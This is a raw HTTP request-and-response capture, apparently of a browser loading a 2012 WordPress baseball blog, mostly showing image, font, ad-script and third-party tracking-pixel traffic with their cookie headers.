Location: http://b.scorecardresearch.com/p2?c1=8&amp;c2=3005693&amp;c3=102&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cv=2.0&amp;cj=1&amp;ljt_r=739317457
Date: Mon, 05 Nov 2012 17:00:35 GMT
Connection: keep-alive
Set-Cookie: UID=16d5718-195.159.219.9-1352134835; expires=Sun, 26-Oct-2014 17:00:35 GMT; path=/; domain=.scorecardresearch.com UIDR=1352134835; expires=Sun, 26-Oct-2014 17:00:35 GMT; path=/; domain=.scorecardresearch.com
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /pixel/p-56WJ0KtIxWJ_2.gif?r=0.22398920963667346 HTTP/1.1

Host: pixel.quantserve.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/gif
Connection: close
Set-Cookie: mc=5097f0b3-cc687-bcba5-79870; expires=Wed, 07-May-2014 17:00:35 GMT; path=/; domain=.quantserve.com
P3P: CP=&quot;NOI DSP COR NID CURa ADMa DEVa PSAo PSDo OUR SAMa IND COM NAV&quot;
Cache-Control: private, no-cache, no-store, proxy-revalidate
Pragma: no-cache
Expires: Fri, 04 Aug 1978 12:00:00 GMT
Content-Length: 35
Date: Mon, 05 Nov 2012 17:00:35 GMT
Server: QS
GET /p2?c1=8&c2=3005693&c3=102&c4=&c5=&c6=&c15=&cv=2.0&cj=1&ljt_r=739317457 HTTP/1.1

Host: b.scorecardresearch.com
GET /p2?c1=8&amp;c2=3005693&amp;c3=102&amp;c4=&amp;c5=&amp;c6=&amp;c15=&amp;cv=2.0&amp;cj=1&amp;ljt_r=739317457 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: UID=16d5718-195.159.219.9-1352134835; UIDR=1352134835
HTTP/1.1 200 OK

Content-Type: image/gif
Content-Length: 43
Date: Mon, 05 Nov 2012 17:00:35 GMT
Connection: keep-alive
Pragma: no-cache
Expires: Mon, 01 Jan 1990 00:00:00 GMT
Cache-Control: private, no-cache, no-cache=Set-Cookie, no-store, proxy-revalidate
GET /wp-content/uploads/2012/03/fbfav.jpg HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 17:00:35 GMT
Server: Apache
Last-Modified: Wed, 28 Mar 2012 22:49:04 GMT
Etag: &quot;2f447df-331-4bc556a0bb793&quot;
Accept-Ranges: bytes
Content-Length: 817
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /wp-content/themes/editorial/functions/thumb.php?src=http://lh3.ggpht.com/-pZPv75WZEOE/UInlbb7YDPI/AAAAAAAAApo/Zp2Gqi6Bdf4/Flickr-6195514846.jpg&w=291&h=120&zc=1&q=90 HTTP/1.1

Host: firebrandal.com
GET /wp-content/themes/editorial/functions/thumb.php?src=http://lh3.ggpht.com/-pZPv75WZEOE/UInlbb7YDPI/AAAAAAAAApo/Zp2Gqi6Bdf4/Flickr-6195514846.jpg&amp;w=291&amp;h=120&amp;zc=1&amp;q=90 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 17:00:35 GMT
Server: Apache
Accept-Ranges: none
Cache-Control: max-age=864000, must-revalidate
Expires: Thu, 15 Nov 2012 17:00:35 GMT
Last-Modified: Mon, 05 Nov 2012 17:00:35 GMT
Content-Length: 12082
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /wp-content/themes/editorial/functions/thumb.php?src=http://farm9.staticflickr.com/8462/8021191316_59556e0351.jpg&w=291&h=120&zc=1&q=90 HTTP/1.1

Host: firebrandal.com
GET /wp-content/themes/editorial/functions/thumb.php?src=http://farm9.staticflickr.com/8462/8021191316_59556e0351.jpg&amp;w=291&amp;h=120&amp;zc=1&amp;q=90 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 17:00:35 GMT
Server: Apache
Accept-Ranges: none
Cache-Control: max-age=864000, must-revalidate
Expires: Thu, 15 Nov 2012 17:00:35 GMT
Last-Modified: Mon, 05 Nov 2012 17:00:35 GMT
Content-Length: 12728
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /wp-content/themes/editorial/functions/thumb.php?src=http://sittingstill.smugmug.com/Spring-Training/Red-Sox-ST-March-17-2012/i-FnZjq26/0/XL/0317126549-XL.jpg&w=291&h=120&zc=1&q=90&a=t HTTP/1.1

Host: firebrandal.com
GET /wp-content/themes/editorial/functions/thumb.php?src=http://sittingstill.smugmug.com/Spring-Training/Red-Sox-ST-March-17-2012/i-FnZjq26/0/XL/0317126549-XL.jpg&amp;w=291&amp;h=120&amp;zc=1&amp;q=90&amp;a=t HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 17:00:35 GMT
Server: Apache
Accept-Ranges: none
Cache-Control: max-age=864000, must-revalidate
Expires: Thu, 15 Nov 2012 17:00:35 GMT
Last-Modified: Mon, 05 Nov 2012 17:00:35 GMT
Content-Length: 13139
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /wp-content/themes/editorial/functions/thumb.php?src=http://farm7.staticflickr.com/6163/6187298403_d6ef41266e_n.jpg&w=291&h=120&zc=1&q=90 HTTP/1.1

Host: firebrandal.com
GET /wp-content/themes/editorial/functions/thumb.php?src=http://farm7.staticflickr.com/6163/6187298403_d6ef41266e_n.jpg&amp;w=291&amp;h=120&amp;zc=1&amp;q=90 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/jpeg
Date: Mon, 05 Nov 2012 17:00:35 GMT
Server: Apache
Accept-Ranges: none
Cache-Control: max-age=864000, must-revalidate
Expires: Thu, 15 Nov 2012 17:00:35 GMT
Last-Modified: Mon, 05 Nov 2012 17:00:35 GMT
Content-Length: 7563
Keep-Alive: timeout=5, max=96
Connection: Keep-Alive
GET /static/fonts/droidsans/v3/s-BiyweUPV0v-yRb-cjciBsxEYwM7FgeyaSgU71cLG0.woff HTTP/1.1

Host: themes.googleusercontent.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fonts.googleapis.com/css?family=Droid+Serif:r,b,i,bi|Droid+Sans:r,b
Origin: http://firebrandal.com
HTTP/1.1 200 OK

Content-Type: font/woff
Last-Modified: Mon, 02 Apr 2012 00:13:23 GMT
Date: Thu, 01 Nov 2012 01:09:12 GMT
Expires: Fri, 01 Nov 2013 01:09:12 GMT
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 26348
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 402683
GET /static/fonts/oflsortsmillgoudytt/v4/4zlbkWdiblhTyAxV3yYOK1Map0k-03pf3IKr-TpLv18_BNIuymZ_hD58qNx2bu5M.woff HTTP/1.1

Host: themes.googleusercontent.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fonts.googleapis.com/css?family=OFL+Sorts+Mill+Goudy+TT:regular,italic
Origin: http://firebrandal.com
HTTP/1.1 200 OK

Content-Type: font/woff
Last-Modified: Mon, 02 Apr 2012 00:13:23 GMT
Date: Mon, 05 Nov 2012 14:36:12 GMT
Expires: Tue, 05 Nov 2013 14:36:12 GMT
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 77752
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 8663
GET /site/5969 HTTP/1.1

Host: tags.bluekai.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 302 Found

Content-Type: text/html
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache/2.2.3 (CentOS)
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;, policyref=&quot;http://tags.bluekai.com/w3c/p3p.xml&quot;
Set-Cookie: bkc=KJynas5QisaCRBM0RUG99h999Oyd9Nx=; expires=Sat, 04-May-2013 17:00:36 GMT; path=/; domain=.bluekai.com bko=; expires=Sat, 04-May-2013 17:00:36 GMT; path=/; domain=.bluekai.com bkp1=; expires=Sat, 04-May-2013 17:00:36 GMT; path=/; domain=.bluekai.com bku=DHz99nEykNOGmgLq; expires=Sat, 04-May-2013 17:00:36 GMT; path=/; domain=.bluekai.com bkw5=; expires=Sat, 04-May-2013 17:00:36 GMT; path=/; domain=.bluekai.com bkdc=wdc; expires=Wed, 05-Dec-2012 17:00:36 GMT; path=/; domain=.bluekai.com
Location: http://tags.bluekai.com/site/5969?dt=0&amp;r=1491956723&amp;sig=2166136261&amp;bkca=KJye999999W=
BK-Server: 5f40
Content-Length: 0
GET /wp-content/themes/editorial/images/ico-rss.png HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/wp-content/themes/editorial/style.css
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache
Last-Modified: Tue, 27 Mar 2012 23:04:56 GMT
Etag: &quot;59cf565-1a2-4bc4184f8abf4&quot;
Accept-Ranges: bytes
Content-Length: 418
Keep-Alive: timeout=5, max=95
Connection: Keep-Alive
GET /wp-content/themes/editorial/images/ico-search.png HTTP/1.1

Host: firebrandal.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/png
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache
Last-Modified: Tue, 27 Mar 2012 23:04:56 GMT
Etag: &quot;59cf566-258-4bc4184fcfd7c&quot;
Accept-Ranges: bytes
Content-Length: 600
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
GET ///www/delivery/ajs.php?zoneid=153334&username=firebrandal&numAds=1&premium=1&eleid=lijit_region_153334&abf=true&tid=153334_13521348357770db92221bcae&lijit_kw=&cb=25247214689&flv=10.0.45&time=18:00:35&ifr=0&loc=http%3A%2F%2Ffirebrandal.com%2F&od=firebrandal.com HTTP/1.1

Host: apr.lijit.com
GET ///www/delivery/ajs.php?zoneid=153334&amp;username=firebrandal&amp;numAds=1&amp;premium=1&amp;eleid=lijit_region_153334&amp;abf=true&amp;tid=153334_13521348357770db92221bcae&amp;lijit_kw=&amp;cb=25247214689&amp;flv=10.0.45&amp;time=18:00:35&amp;ifr=0&amp;loc=http%3A%2F%2Ffirebrandal.com%2F&amp;od=firebrandal.com HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=UTF-8
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache/2.2.22 (Ubuntu)
X-Powered-By: PHP/5.3.10-1ubuntu3.4
Pragma: no-cache
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Set-Cookie: ljt_reader=81ff488f479bafaccad126c81dc2cbca; expires=Tue, 05-Nov-2013 17:00:36 GMT; path=/; domain=.lijit.com
Expires: Fri, 20 Mar 2009 21:49:56 GMT
Vary: Accept-Encoding
Content-Encoding: gzip
Content-Length: 1169
Connection: close
GET /site/5969?dt=0&r=1491956723&sig=2166136261&bkca=KJye999999W= HTTP/1.1

Host: tags.bluekai.com
GET /site/5969?dt=0&amp;r=1491956723&amp;sig=2166136261&amp;bkca=KJye999999W= HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: bkc=KJynas5QisaCRBM0RUG99h999Oyd9Nx=; bko=; bkp1=; bku=DHz99nEykNOGmgLq; bkw5=; bkdc=wdc
HTTP/1.1 200 OK

Content-Type: image/gif
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: Apache/2.2.3 (CentOS)
Set-Cookie: bklc=5097f0b4; expires=Wed, 07-Nov-2012 17:00:36 GMT; path=/; domain=.bluekai.com bkc=KJpM8sJQtem5QVcnCIAOM9y1eJh94rkDPcTYsC2WydiOTQy1GRKRDwQ4+bc0lbwhRNQQIGazOQYs/C8G; expires=Sat, 04-May-2013 17:00:36 GMT; path=/; domain=.bluekai.com bkdc=wdc; expires=Wed, 05-Dec-2012 17:00:36 GMT; path=/; domain=.bluekai.com
P3P: CP=&quot;NOI DSP COR CUR ADMo DEVo PSAo PSDo OUR SAMo BUS UNI NAV&quot;, policyref=&quot;http://tags.bluekai.com/w3c/p3p.xml&quot;
Expires: Tue, 06 Nov 2012 17:00:36 GMT
Cache-Control: max-age=86400, private
BK-Server: a271
Content-Length: 62
GET /pagead/show_ads.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
If-None-Match: 15032493890200785914
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 9126965438495742694
Date: Mon, 05 Nov 2012 16:00:54 GMT
Expires: Mon, 05 Nov 2012 17:00:54 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Content-Encoding: gzip
Server: cafe
Content-Length: 5351
X-XSS-Protection: 1; mode=block
Age: 3582
Cache-Control: public, max-age=3600
GET /avatar/91d7e677423ff4dc152aba65a783688b?s=0&d=wavatar&r=G HTTP/1.1

Host: 1.gravatar.com
GET /avatar/91d7e677423ff4dc152aba65a783688b?s=0&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Mon, 05 Nov 2012 17:00:36 GMT
Expires: Mon, 05 Nov 2012 17:05:36 GMT
Last-Modified: Sun, 16 Jan 2011 22:56:55 GMT
Server: ECS (arn/46E9)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3241707864
Content-Length: 5093
GET /avatar/8e5ac787933bc995f6a5bbf22f618577?s=0&d=wavatar&r=G HTTP/1.1

Host: 0.gravatar.com
GET /avatar/8e5ac787933bc995f6a5bbf22f618577?s=0&amp;d=wavatar&amp;r=G HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: image/png,image/*;q=0.8,*/*;q=0.5
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: image/png
Accept-Ranges: bytes
Access-Control-Allow-Origin: *
Cache-Control: max-age=300
Date: Mon, 05 Nov 2012 17:00:36 GMT
Expires: Mon, 05 Nov 2012 17:05:36 GMT
Last-Modified: Wed, 11 Jan 1984 08:00:00 GMT
Server: ECS (arn/46E5)
Source-Age: 0
Via: 1.1 varnish
X-Cache: HIT
X-Varnish: 3437532517
Content-Length: 5071
GET /mlb/sweetspot/nav?site=firebrand HTTP/1.1

Host: sports.espn.go.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/html
Cache-Control: max-age=15
Content-Encoding: gzip
Transfer-Encoding: chunked
Date: Mon, 05 Nov 2012 17:00:37 GMT
Age: 0
Connection: keep-alive
P3P: CP=&quot;CAO DSP COR CURa ADMa DEVa TAIa PSAa PSDa IVAi IVDi CONi OUR SAMo OTRo BUS PHY ONL UNI PUR COM NAV INT DEM CNT STA PRE&quot;
Set-Cookie: SWID=A473651E-1FF3-4B33-A964-02760AC37F33; path=/; expires=Mon, 05-Nov-2032 17:00:37 GMT; domain=go.com;
GET /static/fonts/droidsans/v3/EFpQQyG9GqCrobXxL-KRMQFhaRv2pGgT5Kf0An0s4MM.woff HTTP/1.1

Host: themes.googleusercontent.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fonts.googleapis.com/css?family=Droid+Serif:r,b,i,bi|Droid+Sans:r,b
Origin: http://firebrandal.com
HTTP/1.1 200 OK

Content-Type: font/woff
Last-Modified: Mon, 02 Apr 2012 00:13:23 GMT
Date: Thu, 01 Nov 2012 01:09:17 GMT
Expires: Fri, 01 Nov 2013 01:09:17 GMT
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 27552
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 402679
GET /pagead/js/r20121023/r20120730/show_ads_impl.js HTTP/1.1

Host: pagead2.googlesyndication.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: text/javascript; charset=UTF-8
P3P: policyref=&quot;http://www.googleadservices.com/pagead/p3p.xml&quot;, CP=&quot;NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC&quot;
Etag: 2745567636224848067
Date: Thu, 01 Nov 2012 01:08:55 GMT
Expires: Thu, 15 Nov 2012 01:08:55 GMT
X-Content-Type-Options: nosniff
Content-Disposition: attachment
Server: cafe
Content-Length: 54485
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=1209600
Age: 402701
GET /en_US/all.js HTTP/1.1

Host: connect.facebook.net

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.1 200 OK

Content-Type: application/x-javascript; charset=utf-8
Etag: &quot;7932b19c34ac15d00cf0a037de95e902&quot;
Content-Encoding: gzip
X-FB-Debug: wDkF2bpUCxu8PWleF3h/Wat3QRYrFTTjDxgbk3v/ZRk=
Content-Length: 57947
Cache-Control: public, max-age=1126
Expires: Mon, 05 Nov 2012 17:19:22 GMT
Date: Mon, 05 Nov 2012 17:00:36 GMT
Connection: keep-alive
Vary: Accept-Encoding
GET /static/fonts/oflsortsmillgoudytt/v4/9ZZVVBRCceNnPBXqWLH8INC5-FYgMOm9n-SazquSTDY.woff HTTP/1.1

Host: themes.googleusercontent.com

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://fonts.googleapis.com/css?family=OFL+Sorts+Mill+Goudy+TT:regular,italic
Origin: http://firebrandal.com
HTTP/1.1 200 OK

Content-Type: font/woff
Last-Modified: Mon, 02 Apr 2012 00:13:23 GMT
Date: Thu, 01 Nov 2012 01:13:57 GMT
Expires: Fri, 01 Nov 2013 01:13:57 GMT
Access-Control-Allow-Origin: *
X-Content-Type-Options: nosniff
Server: sffe
Content-Length: 80868
X-XSS-Protection: 1; mode=block
Cache-Control: public, max-age=31536000
Age: 402399
GET /adserver/tag.php?_t=1f5b&_i=6110&_r=INSERT_RANDOM_NUMBER HTTP/1.1

Host: delivery.switchadhub.com
GET /adserver/tag.php?_t=1f5b&amp;_i=6110&amp;_r=INSERT_RANDOM_NUMBER HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: */*
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
HTTP/1.0 200 OK

Content-Type: text/javascript
X-Powered-By: PHP/5.3.6
P3P: CP=&quot;CUR ADM OUR NOR STA NID&quot;
Cache-Control: no-cache, must-revalidate
Expires: Sat, 26 Jul 1997 05:00:00 GMT
Content-Length: 2351
Date: Mon, 05 Nov 2012 17:00:36 GMT
Server: lighttpd/1.4.26
Connection: close
GET /beacon?viewId=135213483625548a21bea78f0&rand=1352134836255&uri=http://www.lijit.com/users/firebrandal&informer=9247930&type=fpads&loc=http%3A%2F%2Ffirebrandal.com%2F&ifr=0&v=1.0 HTTP/1.1

Host: vbp1den1.lijit.com
GET /beacon?viewId=135213483625548a21bea78f0&amp;rand=1352134836255&amp;uri=http://www.lijit.com/users/firebrandal&amp;informer=9247930&amp;type=fpads&amp;loc=http%3A%2F%2Ffirebrandal.com%2F&amp;ifr=0&amp;v=1.0 HTTP/1.1

User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20101203 Firefox/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Connection: keep-alive
Referer: http://firebrandal.com/
Cookie: ljt_reader=81ff488f479bafaccad126c81dc2cbca
HTTP/1.0 200 OK

Content-Type: text/html
Server: Lijit Blackbird 0.0.2
Cache-Control: no-cache, no-store, must-revalidate, max-age=0
Content-Length: 26
Set-Cookie: tpro=eJxNkMtugzAQRf9l1lZkAiaU32h2VWVZZgBL2EY2VKoi%2Fr3joYmyO%2FO4dx4PyG7DDP3Xt4C4zZigf4CPg7ZxDxv0UoDfnEemH0zZxQA9wCEg4YgpuTB9okl2vmPy%2F0ZriqNbsFi5YKNnqqTU67JTi7xcbwJaqSnFUSeglrqVz5LUNXPV0RgzsbxWuvkoyVqAenNSpNXVtbAkrii4sZa403XDErKxcVnwtJqSGXS2M7ept5K8NAJCDCeqoprdMiQMRfaLPLG5lp5Cqqw3YRjOr43ozcJS8nxheZSxPNea3ZZc93o17Ux7zi6vzC1dm50Jz2PMmLTxHHXHcfwBlZh51Q%3D%3D%00;Expires=Tue, 5-Nov-13 17:00:36 GMT;Domain=localhost tpro_inst=c640d00467269a1db69f2ba3e80c2729;Expires=Tue, 5-Nov-13 17:00:36 GMT;Domain=localhost
GET /wp-content/themes/editorial/functions/thumb.php?src=wp-content/themes/editorial/functions/thumb.php?src=wp-content/uploads/2012/03/vote2.jpg&w=291&h=120&zc=1&q=90&w=291&h=120&zc=1&q=90 HTTP/1.1

Host: firebrandal.com
GET /wp-content/themes/editorial/functions/thumb.php?src=wp-content/themes/editorial/functions/thumb.php?src=wp-content/uploads/2012/03/vote2.jpg&amp;w=291&amp;h=120&amp;zc=1&amp;q=90&amp;w=291&amp;h=120&amp;zc=1&amp;q=90 HTTP/1.1

